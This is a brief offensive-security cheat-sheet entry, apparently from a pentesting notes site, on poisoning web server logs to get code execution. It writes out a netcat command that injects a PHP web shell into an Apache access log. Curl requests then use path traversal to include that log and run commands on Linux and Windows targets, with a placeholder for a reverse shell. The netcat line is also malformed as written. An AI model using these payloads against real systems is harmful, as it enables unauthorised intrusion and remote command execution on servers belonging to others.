#Poison logs with netcat
nc 10.10.10.14 80 <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>'; ?>
#Linux target
curl http://target.com/index.php?view=../../../var/log/apache2/access.log&cmd=INSERT REVSHELL HERE | BASH | PYTHON ...
#Windows target
curl http://target.com/menu.php?file=c:\xamp\apache\logs\access.log&cmd=dir
Last updated 2 years ago